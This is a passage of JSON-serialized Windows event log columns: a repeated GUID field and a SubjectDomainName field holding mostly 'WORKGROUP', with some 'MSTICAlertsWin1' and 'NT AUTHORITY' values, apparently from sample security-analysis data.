cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"NaN\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"NaN\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"NaN\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"NaN\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"NaN\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"NaN\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"NaN\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\"],\"SubjectDomainName\":[\"NaN\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"NaN\",\"WORKGROUP\",\"WORKGROUP\",\"NaN\",\"WORKGROUP\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"NT AUTHORITY\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"MSTICAlertsWin1\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"NT 